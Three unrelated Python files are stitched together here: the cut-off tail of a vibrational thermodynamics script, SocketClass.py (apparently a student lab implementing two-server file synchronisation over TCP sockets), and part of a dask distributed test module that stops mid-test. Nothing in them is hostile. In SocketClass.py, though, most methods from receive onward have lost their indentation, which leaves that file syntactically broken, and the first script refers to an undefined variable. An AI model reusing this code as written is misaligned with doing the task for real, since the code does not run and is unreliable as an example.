            entropy_S += (math.log(f_i[ii] / tildef_i[ii]) / b_beta + w_omega[ii] * (f_i[ii] - 1) - (N + 1) * w_omega[ii] * (tildef_i[ii] - 1)) / Temprt
        ret[0] = GPF_Xi
        ret[1] = GP_Omg
        ret[2] = IE_U
        ret[3] = entropy_S
def multitask(Temprt, Energylist, thermoresults):
    """Fill thermoresults[ii, method, :] for every temperature on the grid.

    NOTE(review): this module-level helper calls ThemoCalc / Bose_EinsteinStat /
    FiniteBE as free functions and reads w_omega / maxn, none of which exist at
    module scope (they are VCIthermo methods and locals) — calling it as
    written raises NameError. Presumably it predates the move into the class.
    """
    for ii in range(len(Temprt)):
        ThemoCalc(Temprt[ii], Energylist, thermoresults[ii, 0, :])
        Bose_EinsteinStat(Temprt[ii], w_omega, thermoresults[ii, 1, :])
        FiniteBE(Temprt[ii], w_omega, maxn, thermoresults[ii, 2, :])
    #np.save("../data/thermoresult_Lambda0",thermoresults)
def Parallel_VCI(maxn, Lambd, Temprt, calVCI):
    """Worker entry point: run one VCIthermo job and save its temperature grid.

    NOTE(review): VCIthermo.__init__ does not assign self.thermoresults in
    this revision (that code is commented out), so the np.save below would
    raise AttributeError — confirm before re-enabling the multiprocessing
    driver that targets this function.
    """
    vcirun = VCIthermo(Lambd, Temprt, maxn, calVCI)
    np.save("../data/Temprtgrid_n_" + str(maxn) + ".npy", vcirun.thermoresults)
#def Parallel_VCI(Temprt,maxn,Lambd,idx):
# filename = "../data/figuremakingup_"+str(idx)+".csv"
# vcirun = VCIthermo(Lambd,Temprt,maxn,calVCI)
# reslt = vcirun.thermoresults
# if (len(reslt[:,0,0])!= 1):
# print("error")
# with open(filename,'w') as csvfile:
# csvwriter = csv.writer(csvfile)
# for i in range(3):
# #for ii in range(len(Temprt)):
# csvwriter.writerow([reslt[0,i,0],reslt[0,i,1],reslt[0,i,2],reslt[0,i,3]])
# ---- module-level driver --------------------------------------------------
# The mode count (3 for H2O) and related settings are currently hard-coded
# inside VCIthermo; only the temperature grid is built here.
maxnlist = [4, 6]  # candidate per-mode maximum excitation levels (larger grids disabled)
# Temperatures are specified in K and converted to a.u. via Eh/kB = 3.1577464e5.
Ehbykb = 3.1577464 * 100000
Tlist = np.arange(2, 8.1, 0.1)  # log10(T/K) grid
Temprt = np.zeros(np.shape(Tlist))
for idx in range(np.shape(Tlist)[0]):
    Temprt[idx] = 10 ** (Tlist[idx])
Temprt = Temprt / Ehbykb
calVCI = 0
Lambd = 1
maxn = 16
vcirun = VCIthermo(Lambd, Temprt, maxn, calVCI)
t1 = time.time()
print("time is /min", (t1 - t0) / 60)
|
SocketClass.py | #!/usr/bin/python3
'''
Name: Sagnik Hajra
ID: 1001851338
'''
import socket
import time
import os
import json
import threading
import file_exchange_client
import file_exchange_server
class SocketClass:
    def __init__(self, add, port, server=False, clientLimit=10):
        """Create either a listening server socket or a connected client socket.

        :param add: host address to bind (server) or connect to (client)
        :param port: TCP port number
        :param server: True -> bind + listen; False -> connect as a client
        :param clientLimit: listen() backlog when acting as a server
        :raises ConnectionRefusedError: in client mode when nothing is listening
        """
        self.ADDRESS = add
        self.PORT = port
        # Wire protocol: every message is prefixed with a fixed-width,
        # left-justified decimal length field of HEADER_SIZE characters.
        self.HEADER_SIZE = 10
        self.MSG_SIZE = 1024  # recv() chunk size in bytes
        self.FORMAT = 'utf-8'
        self.command = ''
        self.DELAY_TIME = 0.1
        # Protocol keyword messages exchanged between peers.
        self.WELCOME = "WELCOME"
        self.INVALID_COMMAND = "INVALID"
        self.CONNECTION_CLOSE = "CONNECTION_CLOSE"
        # When one server is scanning files at directories, all requests for file metadata has to wait.
        # The flag used for that is self.scanning
        self.scanning = False
        # dict(list) :- for modification time and size in bytes.
        # Will have two keys, one for deleted and another for existing files.
        self.own_file_meta_data = {}
        self.file_metadata_index = []
        self.locked_file = set()
        # Deletions deferred because the file was locked at the time.
        self.delete_queue = set()
        # dict(list) :- Keeps track of the other server file metadata
        self.others_file_meta_data = {}
        # Command vocabulary understood by the request dispatcher.
        self.client_command = "lab3"
        self.exit = "exit"
        self.success = "Successful"
        self.metadata = "metadata"
        self.file_data = "file_data"
        self.FILE_SENT = "File is sent"
        # Keys used inside the metadata JSON payloads.
        self.file_metadata_key = "file_metadata"
        self.deleted_key = "deleted"
        self.accepted_commands = {self.client_command, self.file_data, self.metadata, self.exit}
        self.file_deleted = {}
        self.file_transaction_complete = True
        # Human-readable responses keyed by protocol keyword.
        self.messages = {
            self.WELCOME: "Welcome to server..:",
            self.INVALID_COMMAND: "Command not found",
            self.CONNECTION_CLOSE: "Closing the connection...",
            self.success: "Request handled successfully..."
        }
        # For the 1st purpose: All server will be listening to one port(server port) to accept client requests
        if server:
            self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            # SO_REUSEADDR avoids "address already in use" on quick restarts.
            self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            self.socket.bind((self.ADDRESS, self.PORT))
            self.socket.listen(clientLimit)
            print(f"{self.ADDRESS} started listening on port number {self.PORT}....")
        # For the second purpose: To send query to other servers to keep the file directory in sync
        else:
            self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.socket.connect((self.ADDRESS, self.PORT))
def receive(self, sock):
"""
:param sock: socket object which is expected to receive some message from a client/server
:return: Parse and combine all the message(s). Return when combined will have the exact length+self.HEADER_SIZE
"""
command = ''
new_msg = True
msgLen = 0
while True:
msg = sock.recv(self.MSG_SIZE)
if new_msg and msg:
msgLen = int(msg[:self.HEADER_SIZE])
new_msg = False
command += msg.decode(self.FORMAT)
if len(command) - self.HEADER_SIZE == msgLen:
return command[self.HEADER_SIZE:]
def send(self, return_msg, sock, sleep=0):
""""
:param return_msg: The message that needs to be sent to a client/server
:param sock: socket object which is expected to receive some message from a client
:param sleep: As the program is executed in local machine the network latency is almost none, sometimes forced latency is needed.
:return: Parse/combine all the messages with header size==self.HEADER_SIZE and return
"""
returnMsg = f"{len(return_msg):<{self.HEADER_SIZE}}" + return_msg
time.sleep(sleep)
sock.send(bytes(returnMsg, self.FORMAT))
# Compare the files from others against own dir,
# idea is to keep everything in sync and when mismatches are found, return then
def comparing_other_server_file_dir(self):
mismatches = []
# For smoke, there has to be fire
if not self.others_file_meta_data:
return []
own_file_metadata = self.own_file_meta_data[self.file_metadata_key]
for key in self.others_file_meta_data:
# If file found at other server but recently deleted from this server, ignore(Other servers aren't in sync)
# Do the same if the file is locked
if key in self.own_file_meta_data[self.deleted_key] or key in self.locked_file:
continue
# If file is missing from own metadata dictionary, add to mismatches
if key not in own_file_metadata:
mismatches.append(key)
continue
# If own file last modified time is older then add to mismatches
if own_file_metadata[key][0] < self.others_file_meta_data[key][0]:
mismatches.append(key)
return mismatches
# Each server invokes this thread as soon as they start
# Keep scanning for files in their own directory(then refresh the metadata database) as well as other server(s)
# takes a 5 sec nap in between
    def get_synced(self):
        """Background sync loop (never returns).

        Each round: rescan the local directory, pull the peer's metadata,
        diff the two, fetch any files the peer has newer, then nap 5 seconds.
        Each server starts this on its own thread at startup.
        """
        while True:
            # print("syncing started..")
            self.scan_file_metadata()
            # Refresh our view of the peer's metadata before diffing.
            self.fetch_from_other_server(meta_data=True)
            mismatches = self.comparing_other_server_file_dir()
            if mismatches:
                print(mismatches)
                # The peer expects multiple file names joined with '||'.
                file_names = "||".join(mismatches)
                self.fetch_from_other_server(data_file=file_names)
            # print("syncing finished..")
            time.sleep(5)
# Below method deletes a file when the same file is deleted from other server(s) to be in sync
def delete_files(self, deleted):
for files in deleted:
if files in self.own_file_meta_data[self.file_metadata_key]:
if files not in self.locked_file:
self.delete_a_file(files)
else:
self.delete_queue.add(files)
print(self.delete_queue)
# Remove a single file from the metadata bookkeeping and from disk.
def delete_a_file(self, file):
    """Drop *file* from the metadata dict and index, then unlink it on disk
    (if it still exists in the working directory)."""
    self.own_file_meta_data[self.file_metadata_key].pop(file)
    self.file_metadata_index.remove(file)
    path = f"{self.workingDir}/{file}"
    if os.path.isfile(path):
        os.remove(path)
# Decode a message received from a peer server.
def interpret_message(self, message, metadata=False):
    """When *metadata* is true, parse *message* as the peer's JSON metadata:
    apply its deletions locally, then remember its file table for the next
    mismatch comparison. Non-metadata messages are ignored here."""
    if not metadata:
        return
    payload = json.loads(message)
    # print(payload)
    deleted = payload[self.deleted_key]
    if deleted:
        self.delete_files(deleted)
    self.others_file_meta_data = payload[self.file_metadata_key]
# Acts like a client to the peer server and fetches file info from it.
def fetch_from_other_server(self, meta_data=False, data_file=""):
    """Connect to the peer server and either push our metadata command
    (*meta_data*) or request the "||"-separated *data_file* names.

    Connection refusals are reported and swallowed so the sync loop keeps
    running while the peer is down.
    """
    try:
        # BUG FIX (naming): this local was called `socket`, shadowing the
        # imported socket module inside this method.
        client = SocketClass('localhost', self.parallel_server_port)
    except ConnectionRefusedError:
        print(f"Connection was refused by localhost:{self.parallel_server_port}. Please check the connection.")
        return

    def close_socket():
        # print(f"Message received, closing the sync of {obj.PRT} socket")
        client.socket.close()

    while True:
        server_msg = client.receive(client.socket)
        if server_msg == client.CONNECTION_CLOSE:
            return close_socket()
        elif server_msg == client.WELCOME:
            # Handshake done: issue exactly one command per connection.
            if meta_data:
                client.send(self.metadata, client.socket)
            elif data_file:
                client.send(f"{self.file_data}:{data_file}", client.socket)
                data_file = ""
        elif server_msg not in client.messages:
            # Anything that is not a protocol control message is payload.
            self.interpret_message(server_msg, metadata=meta_data)
# Check for existing, new and deleted files. Stores the result in
# self.own_file_meta_data, which has two keys: one for deleted files and one
# for existing/new files. This server does not care which files are new --
# that's the other servers' business.
def scan_file_metadata(self):
    """Rescan the working directory and rebuild the local file metadata.

    Sets self.scanning while running so readers (parse_message, the sync
    loop) can wait for a consistent snapshot. Each file maps to
    [mtime, size]; files that disappeared since the last scan are recorded
    under the deleted key so peers can mirror the deletion.
    """
    self.scanning = True
    tmp_file_meta_data = {}
    tmp_file_metadata_index = []
    deleted = []
    for item in os.listdir(self.workingDir):
        file_path = self.workingDir + "/" + item
        # Directories are ignored; only plain files are synced.
        if os.path.isfile(file_path):
            tmp_file_meta_data[str(item)] = [os.path.getmtime(file_path), os.path.getsize(file_path)]
            tmp_file_metadata_index.append(str(item))
    # When there were files previously, diff against the old table to find
    # deletions; on the very first scan (empty dict) there is nothing to diff.
    if self.own_file_meta_data:
        old_file_meta_data = self.own_file_meta_data[self.file_metadata_key]
        for key in old_file_meta_data:
            if key not in tmp_file_meta_data:
                deleted.append(key)
                self.file_metadata_index.remove(key)
    self.own_file_meta_data[self.deleted_key] = deleted
    self.own_file_meta_data[self.file_metadata_key] = tmp_file_meta_data
    self.file_metadata_index = tmp_file_metadata_index
    # print(self.own_file_meta_data)
    self.scanning = False
# One job of each server is to hand over files that another server asked
# for; this delegates the transfer to the file-exchange client.
def send_files(self, file_names):
    """Send every file named in the "||"-separated *file_names* string to
    the peer via file_exchange_client, reporting any that failed."""
    print(f"The following files were received: {file_names}")
    requested = list(file_names.split("||"))
    failed = file_exchange_client.send_all_files(
        self.workingDir, requested, self.file_excng_client_port
    )
    if failed:
        print(f"The following files are not synced: {failed}")
    else:
        print("Got all files")
def create_json_dump(self):
    """Serialise the local metadata to JSON for a peer, hiding locked files.

    With no locked files the whole metadata dict is dumped as-is; otherwise
    a filtered copy is built so locked entries never reach the peer.
    """
    if not self.locked_file:
        return json.dumps(self.own_file_meta_data)
    meta = self.own_file_meta_data[self.file_metadata_key]
    visible = {
        self.deleted_key: self.own_file_meta_data[self.deleted_key],
        self.file_metadata_key: {
            name: info for name, info in meta.items() if name not in self.locked_file
        },
    }
    return json.dumps(visible)
# The below function interprets the commands received from a client.
def parse_message(self, client_socket=socket):
    """Dispatch self.command and return (reply, close_the_socket).

    Recognised commands: the metadata command (returns the JSON dump and
    closes), the plain client listing command (returns nicer()), a
    "<client_command>-<lock|unlock>-<index>" lock management command, and a
    "<file_data>:<names>" file request. Anything else yields INVALID_COMMAND.

    NOTE(review): `client_socket` defaults to the socket *module* and is
    never used in this body -- presumably a leftover parameter; confirm
    before removing.
    """
    close_the_socket = True
    if self.command in self.accepted_commands:
        if self.command == self.metadata:
            # Server needs to wait while another thread is scanning the metadata.
            while self.scanning:
                time.sleep(.01)
            # Scanning flag cleared: safe to serialise the file metadata.
            return self.create_json_dump(), close_the_socket
        elif self.command == self.client_command:
            close_the_socket = False
            while self.scanning:
                time.sleep(.01)
            return self.nicer(), close_the_socket
        else:
            close_the_socket = False
            return self.INVALID_COMMAND, close_the_socket
    elif self.command.split("-")[0].strip() == self.client_command:
        # Lock management: "<client_command>-<option>-<file index>".
        close_the_socket = False
        option, file_idx = self.command.split("-")[1], self.command.split("-")[2]
        option, file_idx = option.strip(), file_idx.strip()
        try:
            file_idx = int(file_idx)
            # Reject out-of-range indexes and unlocks of files not locked.
            if file_idx >= len(self.file_metadata_index):
                raise ValueError
            file_name = self.file_metadata_index[file_idx]
            if option == "unlock" and file_name not in self.locked_file:
                raise ValueError
        except ValueError:
            close_the_socket = False
            return self.INVALID_COMMAND, close_the_socket
        while self.scanning:
            time.sleep(.01)
        if option == "lock":
            self.locked_file.add(file_name)
            return self.success, close_the_socket
        elif option == "unlock":
            self.locked_file.remove(file_name)
            # A peer may have deleted this file while it was locked; apply
            # the queued deletion now that the lock is released.
            if file_name in self.delete_queue:
                self.delete_a_file(file_name)
                self.delete_queue.remove(file_name)
            return self.success, close_the_socket
        else:
            close_the_socket = False
            return self.INVALID_COMMAND, close_the_socket
    elif self.command.split(":")[0] == self.file_data:
        # File request from a peer: everything after the first ":" is the
        # "||"-separated list of file names to send back.
        file_names = self.command.split(':')[1]
        print(f"{time.ctime(time.time())}| request for file {file_names} has been received")
        self.send_files(file_names)
        return "Finished sending", close_the_socket
    else:
        close_the_socket = False
        return self.INVALID_COMMAND, close_the_socket
def handle_client(self, client_socket):
    """Per-connection loop: greet the client, then read commands, dispatch
    them through parse_message and send replies until a command asks for
    the connection to be closed."""
    # Send the welcome message
    self.send(self.WELCOME, client_socket)
    while True:
        self.command = self.receive(client_socket)
        if self.command:
            if self.command.strip() == self.exit:
                close_the_socket = True
            else:
                return_msg, close_the_socket = self.parse_message()
                self.send(return_msg, client_socket, self.DELAY_TIME)
            # For a clean exit: tell the client we are closing before we do.
            if close_the_socket:
                self.send(self.CONNECTION_CLOSE, client_socket, self.DELAY_TIME)
                client_socket.close()
                return
def start(self):
    """Start the server's three thread types and serve clients forever.

    :job: Starts three different types of threads; the last type connects
        with a client, receives commands, parses them and responds.
    :returns: None (blocks forever accepting connections)
    """
    # Thread Type1: accept files pushed by the other server.
    file_exchange_thread = threading.Thread(
        target=file_exchange_server.receiver, args=(self.workingDir, self.file_excng_server_port,)
    )
    file_exchange_thread.start()
    # Thread Type2: run the sync loop every 5 seconds.
    server_thread = threading.Thread(target=self.get_synced)
    server_thread.start()
    # Thread Type3: one handler thread per accepted client connection.
    while True:
        client_socket, (clientAdd, clientPort) = self.socket.accept()
        # print(f"{time.ctime(time.time())}| connection from {clientAdd, clientPort} has been established")
        thread = threading.Thread(target=self.handle_client, args=(client_socket,))
        thread.start()
        # Exclude the main thread from the count shown in debugging output.
        active_count = threading.active_count() - 1
        # print(f"Number of Threads active:{active_count}")
def nicer(self):
    """Return human-readable metadata for all files in the master directory.

    Each line has the form ``[idx]||mtime||size||name`` with an optional
    ``|| [Locked]`` suffix. Returns the placeholder row ``"|| || ||\\n"``
    when there are no files or when the metadata is inconsistent (KeyError).
    """
    rows = ""
    # Fetch the file metadata table from the instance state.
    file_list = self.own_file_meta_data[self.file_metadata_key]
    try:
        # IDIOM FIX: enumerate replaces the manually maintained index counter.
        for index, file_name in enumerate(self.file_metadata_index):
            last_modified_time = file_list[file_name][0]
            size = file_list[file_name][1]
            # Convert the raw metadata into human readable form.
            readable_time = self.get_file_datetime(last_modified_time)
            readable_size = self.human_readable_bytes(size)
            locked_status = "|| [Locked]" if file_name in self.locked_file else ""
            rows += f'[{index}]||{readable_time}||{readable_size}||{file_name}{locked_status}\n'
        if not rows:
            rows = "|| || ||\n"
    except KeyError:
        # Index and metadata table disagree (e.g. mid-scan); show raw state.
        print(self.own_file_meta_data)
        return "|| || ||\n"
    return rows
# Convert an epoch timestamp into a human readable datetime string.
def get_file_datetime(self, time_second):
    """
    :param time_second: last modification time of a file, in (fractional) seconds
    :return: datetime string such as 'Mon Aug 30 14:48:46 2021'
    """
    formatted = time.ctime(time_second)
    return formatted
# Below code was adapted from stackoverflow. Link is given:
# https://stackoverflow.com/questions/12523586/python-format-size-application-converting-b-to-kb-mb-gb-tb/63839503
def human_readable_bytes(self, size):
    """
    :param self: object of either ServerA or ServerB (unused)
    :param size: the size of a file in bytes
    :return: the most feasible human friendly Bytes/KB/MB/GB/TB string,
        left-justified to at least 15 characters
    """
    B = float(size)
    KB = float(1024)
    MB = float(KB ** 2)     # 1,048,576
    GB = float(KB ** 3)     # 1,073,741,824
    TB = float(KB ** 4)     # 1,099,511,627,776
    if B < KB:
        # BUG FIX: the original `0 == B > 1` chains to (0 == B) and (B > 1),
        # which is always False, so the plural "Bytes" was never produced.
        return_str = '{0} {1}'.format(B, 'Byte' if B == 1 else 'Bytes')
    elif B < MB:
        return_str = '{0:.2f} KB'.format(B / KB)
    elif B < GB:
        return_str = '{0:.2f} MB'.format(B / MB)
    elif B < TB:
        return_str = '{0:.2f} GB'.format(B / GB)
    else:
        # BUG FIX: a plain else guarantees return_str is always bound.
        return_str = '{0:.2f} TB'.format(B / TB)
    # Pad to a fixed 15-character column (no-op for longer strings).
    return return_str.ljust(15)
|
test_utils_test.py | import asyncio
import os
import pathlib
import socket
import threading
from contextlib import contextmanager
from time import sleep
import pytest
import yaml
from tornado import gen
from distributed import Client, Nanny, Scheduler, Worker, config, default_client
from distributed.core import Server, rpc
from distributed.metrics import time
from distributed.utils import get_ip
from distributed.utils_test import (
_LockedCommPool,
_UnhashableCallable,
assert_worker_story,
cluster,
dump_cluster_state,
gen_cluster,
gen_test,
inc,
new_config,
tls_only_security,
wait_for_port,
)
# Smoke test: a 10-worker cluster starts and tears down cleanly.
def test_bare_cluster(loop):
    with cluster(nworkers=10) as (s, _):
        pass


# The default cluster exposes a scheduler and two workers over RPC.
def test_cluster(loop):
    with cluster() as (s, [a, b]):
        with rpc(s["address"]) as s:
            ident = loop.run_sync(s.identity)
            assert ident["type"] == "Scheduler"
            assert len(ident["workers"]) == 2
# The gen_cluster decorator injects (client, scheduler, worker, worker) into
# the wrapped coroutine; these tests verify the injected objects and that
# gen_cluster composes with pytest fixtures and parametrization.
@gen_cluster(client=True)
async def test_gen_cluster(c, s, a, b):
    assert isinstance(c, Client)
    assert isinstance(s, Scheduler)
    for w in [a, b]:
        assert isinstance(w, Worker)
    assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
    assert await c.submit(lambda: 123) == 123


@gen_cluster(client=True)
async def test_gen_cluster_pytest_fixture(c, s, a, b, tmp_path):
    # pytest fixtures may be requested alongside the injected cluster args.
    assert isinstance(tmp_path, pathlib.Path)
    assert isinstance(c, Client)
    assert isinstance(s, Scheduler)
    for w in [a, b]:
        assert isinstance(w, Worker)


@pytest.mark.parametrize("foo", [True])
@gen_cluster(client=True)
async def test_gen_cluster_parametrized(c, s, a, b, foo):
    assert foo is True
    assert isinstance(c, Client)
    assert isinstance(s, Scheduler)
    for w in [a, b]:
        assert isinstance(w, Worker)


@pytest.mark.parametrize("foo", [True])
@pytest.mark.parametrize("bar", ["a", "b"])
@gen_cluster(client=True)
async def test_gen_cluster_multi_parametrized(c, s, a, b, foo, bar):
    assert foo is True
    assert bar in ("a", "b")
    assert isinstance(c, Client)
    assert isinstance(s, Scheduler)
    for w in [a, b]:
        assert isinstance(w, Worker)


@pytest.mark.parametrize("foo", [True])
@gen_cluster(client=True)
async def test_gen_cluster_parametrized_variadic_workers(c, s, *workers, foo):
    # Workers may also be collected with *args; parametrized values follow.
    assert foo is True
    assert isinstance(c, Client)
    assert isinstance(s, Scheduler)
    for w in workers:
        assert isinstance(w, Worker)
@gen_cluster(
    client=True,
    Worker=Nanny,
    config={"distributed.comm.timeouts.connect": "1s", "new.config.value": "foo"},
)
async def test_gen_cluster_set_config_nanny(c, s, a, b):
    # Config passed to gen_cluster must propagate both to nanny-spawned
    # worker processes and to the scheduler.
    def assert_config():
        import dask

        assert dask.config.get("distributed.comm.timeouts.connect") == "1s"
        assert dask.config.get("new.config.value") == "foo"
        return dask.config

    await c.run(assert_config)
    await c.run_on_scheduler(assert_config)


@pytest.mark.skip(reason="This hangs on travis")
def test_gen_cluster_cleans_up_client(loop):
    # The temporary default client set up by gen_cluster must not leak into
    # the surrounding (synchronous) context.
    import dask.context

    assert not dask.config.get("get", None)

    @gen_cluster(client=True)
    async def f(c, s, a, b):
        assert dask.config.get("get", None)
        await c.submit(inc, 1)

    f()

    assert not dask.config.get("get", None)
@gen_cluster()
async def test_gen_cluster_without_client(s, a, b):
    # Without client=True only scheduler and workers are injected; a client
    # can still be created manually against the scheduler address.
    assert isinstance(s, Scheduler)
    for w in [a, b]:
        assert isinstance(w, Worker)
    assert s.nthreads == {w.address: w.nthreads for w in [a, b]}

    async with Client(s.address, asynchronous=True) as c:
        future = c.submit(lambda x: x + 1, 1)
        result = await future
        assert result == 2


@gen_cluster(
    client=True,
    scheduler="tls://127.0.0.1",
    nthreads=[("tls://127.0.0.1", 1), ("tls://127.0.0.1", 2)],
    security=tls_only_security(),
)
async def test_gen_cluster_tls(e, s, a, b):
    # With TLS-only security every component address must use tls://.
    assert isinstance(e, Client)
    assert isinstance(s, Scheduler)
    assert s.address.startswith("tls://")
    for w in [a, b]:
        assert isinstance(w, Worker)
        assert w.address.startswith("tls://")
    assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
# The strict xfail marks below prove that gen_test actually executes the
# wrapped body (the deliberate `assert False` must be reached).
@pytest.mark.xfail(
    reason="Test should always fail to ensure the body of the test function was run",
    strict=True,
)
@gen_test()
async def test_gen_test():
    await asyncio.sleep(0.01)
    assert False


@pytest.mark.xfail(
    reason="Test should always fail to ensure the body of the test function was run",
    strict=True,
)
@gen_test()
def test_gen_test_legacy_implicit():
    # Legacy generator-style coroutine without an explicit decorator.
    yield asyncio.sleep(0.01)
    assert False


@pytest.mark.xfail(
    reason="Test should always fail to ensure the body of the test function was run",
    strict=True,
)
@gen_test()
@gen.coroutine
def test_gen_test_legacy_explicit():
    # Legacy tornado gen.coroutine style.
    yield asyncio.sleep(0.01)
    assert False


@pytest.mark.parametrize("foo", [True])
@gen_test()
async def test_gen_test_parametrized(foo):
    assert foo is True


@pytest.mark.parametrize("foo", [True])
@pytest.mark.parametrize("bar", [False])
@gen_test()
async def test_gen_test_double_parametrized(foo, bar):
    assert foo is True
    assert bar is False


@gen_test()
async def test_gen_test_pytest_fixture(tmp_path, c):
    # gen_test must also cooperate with pytest fixtures.
    assert isinstance(tmp_path, pathlib.Path)
    assert isinstance(c, Client)
@contextmanager
def _listen(delay=0):
    """Bind a throwaway socket on 127.0.0.1 and, from a background thread,
    start listening on it after *delay* seconds; yield the socket meanwhile.

    Used by test_wait_for_port to simulate a port that becomes available
    only after some time.
    """
    serv = socket.socket()
    serv.bind(("127.0.0.1", 0))
    e = threading.Event()

    def do_listen():
        e.set()
        sleep(delay)
        serv.listen(5)
        # NOTE(review): socket.accept() always returns a tuple, so this
        # None check looks vestigial -- confirm before simplifying.
        ret = serv.accept()
        if ret is not None:
            cli, _ = ret
            cli.close()
        serv.close()

    t = threading.Thread(target=do_listen)
    t.daemon = True
    t.start()
    try:
        # Wait until the thread is running, then give it a moment to sleep.
        e.wait()
        sleep(0.01)
        yield serv
    finally:
        t.join(5.0)
def test_wait_for_port():
    # An unreachable port must time out after (at least) the given timeout.
    t1 = time()
    with pytest.raises(RuntimeError):
        wait_for_port((get_ip(), 9999), 0.5)
    t2 = time()
    assert t2 - t1 >= 0.5

    # An immediately-listening port is detected quickly ...
    with _listen(0) as s1:
        t1 = time()
        wait_for_port(s1.getsockname())
        t2 = time()
        assert t2 - t1 <= 1.0

    # ... and a port that starts listening after 1s is detected shortly after.
    with _listen(1) as s1:
        t1 = time()
        wait_for_port(s1.getsockname())
        t2 = time()
        assert t2 - t1 <= 2.0
def test_new_config():
    # new_config must apply its overrides inside the context and fully
    # restore the previous config on exit.
    c = config.copy()
    with new_config({"xyzzy": 5}):
        # BUG FIX: the comparison result was previously discarded
        # (bare `config["xyzzy"] == 5`), so nothing was verified.
        assert config["xyzzy"] == 5

    assert config == c
    assert "xyzzy" not in config
def test_lingering_client():
    # A client created inside gen_cluster must not remain registered as the
    # default client once the cluster has shut down.
    @gen_cluster()
    async def f(s, a, b):
        await Client(s.address, asynchronous=True)

    f()

    with pytest.raises(ValueError):
        default_client()


def test_lingering_client_2(loop):
    # A client left open when the cluster context exits must not break teardown.
    with cluster() as (s, [a, b]):
        client = Client(s["address"], loop=loop)
def test_tls_cluster(tls_client):
    # BUG FIX: the comparison result was previously discarded
    # (bare `... .result() == 11`), so the submitted task was never verified.
    assert tls_client.submit(lambda x: x + 1, 10).result() == 11
    assert tls_client.security
@pytest.mark.asyncio
async def test_tls_scheduler(security, cleanup):
    # A scheduler started with TLS security must advertise a tls:// address.
    async with Scheduler(
        security=security, host="localhost", dashboard_address=":0"
    ) as s:
        assert s.address.startswith("tls")


def test__UnhashableCallable():
    # The helper must remain callable while refusing to be hashed.
    func = _UnhashableCallable()
    assert func(1) == 2
    with pytest.raises(TypeError, match="unhashable"):
        hash(func)
class MyServer(Server):
    """Minimal Server subclass exposing a "ping" handler that counts calls,
    used by the _LockedCommPool tests below."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.handlers["ping"] = self.pong
        # Number of pings handled so far.
        self.counter = 0

    def pong(self, comm):
        self.counter += 1
        return "pong"
@pytest.mark.asyncio
async def test_locked_comm_drop_in_replacement(loop):
    # With its read event set, _LockedCommPool behaves like the pool it wraps
    # while still recording traffic on the read queue.
    a = await MyServer({})
    await a.listen(0)

    read_event = asyncio.Event()
    read_event.set()
    read_queue = asyncio.Queue()
    original_pool = a.rpc
    a.rpc = _LockedCommPool(original_pool, read_event=read_event, read_queue=read_queue)

    b = await MyServer({})
    await b.listen(0)

    # Event is set, the pool works like an ordinary pool
    res = await a.rpc(b.address).ping()
    assert await read_queue.get() == (b.address, "pong")
    assert res == "pong"
    assert b.counter == 1

    read_event.clear()
    # Can also be used without a lock to intercept network traffic
    a.rpc = _LockedCommPool(original_pool, read_queue=read_queue)
    a.rpc.remove(b.address)
    res = await a.rpc(b.address).ping()
    assert await read_queue.get() == (b.address, "pong")


@pytest.mark.asyncio
async def test_locked_comm_intercept_read(loop):
    # Blocking only the read side: the remote handles the request, but the
    # caller's future stays pending until the read event is set.
    a = await MyServer({})
    await a.listen(0)
    b = await MyServer({})
    await b.listen(0)

    read_event = asyncio.Event()
    read_queue = asyncio.Queue()
    a.rpc = _LockedCommPool(a.rpc, read_event=read_event, read_queue=read_queue)

    async def ping_pong():
        return await a.rpc(b.address).ping()

    fut = asyncio.create_task(ping_pong())

    # We didn't block the write but merely the read. The remote should have
    # received the message and responded already
    while not b.counter:
        await asyncio.sleep(0.001)

    with pytest.raises(asyncio.TimeoutError):
        await asyncio.wait_for(asyncio.shield(fut), 0.01)
    assert await read_queue.get() == (b.address, "pong")
    read_event.set()
    assert await fut == "pong"


@pytest.mark.asyncio
async def test_locked_comm_intercept_write(loop):
    # Blocking the write side: the remote sees nothing until the write event
    # is set, and the outgoing payload is observable on the write queue.
    a = await MyServer({})
    await a.listen(0)
    b = await MyServer({})
    await b.listen(0)

    write_event = asyncio.Event()
    write_queue = asyncio.Queue()
    a.rpc = _LockedCommPool(a.rpc, write_event=write_event, write_queue=write_queue)

    async def ping_pong():
        return await a.rpc(b.address).ping()

    fut = asyncio.create_task(ping_pong())

    with pytest.raises(asyncio.TimeoutError):
        await asyncio.wait_for(asyncio.shield(fut), 0.01)
    # Write was blocked. The remote hasn't received the message, yet
    assert b.counter == 0
    assert await write_queue.get() == (b.address, {"op": "ping", "reply": True})
    write_event.set()
    assert await fut == "pong"
@pytest.mark.slow()
def test_dump_cluster_state_timeout(tmp_path):
    # When a test body exceeds gen_cluster's timeout, a cluster state dump
    # named after the test must be written to cluster_dump_directory.
    sleep_time = 30

    async def inner_test(c, s, a, b):
        await asyncio.sleep(sleep_time)

    # This timeout includes cluster startup and teardown which sometimes can
    # take a significant amount of time. For this particular test we would like
    # to keep the _test timeout_ small because we intend to trigger it but the
    # overall timeout large.
    test = gen_cluster(client=True, timeout=5, cluster_dump_directory=tmp_path)(
        inner_test
    )
    try:
        with pytest.raises(asyncio.TimeoutError) as exc:
            test()
        assert "inner_test" in str(exc)
        assert "await asyncio.sleep(sleep_time)" in str(exc)
    except gen.TimeoutError:
        pytest.xfail("Cluster startup or teardown took too long")

    _, dirs, files = next(os.walk(tmp_path))
    assert not dirs
    assert files == [inner_test.__name__ + ".yaml"]
    # NOTE(review): yaml is already imported at module scope; this local
    # re-import is redundant.
    import yaml

    with open(tmp_path / files[0], "rb") as fd:
        state = yaml.load(fd, Loader=yaml.Loader)
    assert "scheduler" in state
    assert "workers" in state
def test_assert_worker_story():
    # Exercises both lax (ordered subsequence) and strict (exact) matching
    # of worker stories against expected event prefixes.
    now = time()
    story = [
        ("foo", "id1", now - 600),
        ("bar", "id2", now),
        ("baz", {1: 2}, "id2", now),
    ]
    # strict=False
    assert_worker_story(story, [("foo",), ("bar",), ("baz", {1: 2})])
    assert_worker_story(story, [])
    assert_worker_story(story, [("foo",)])
    assert_worker_story(story, [("foo",), ("bar",)])
    with pytest.raises(AssertionError):
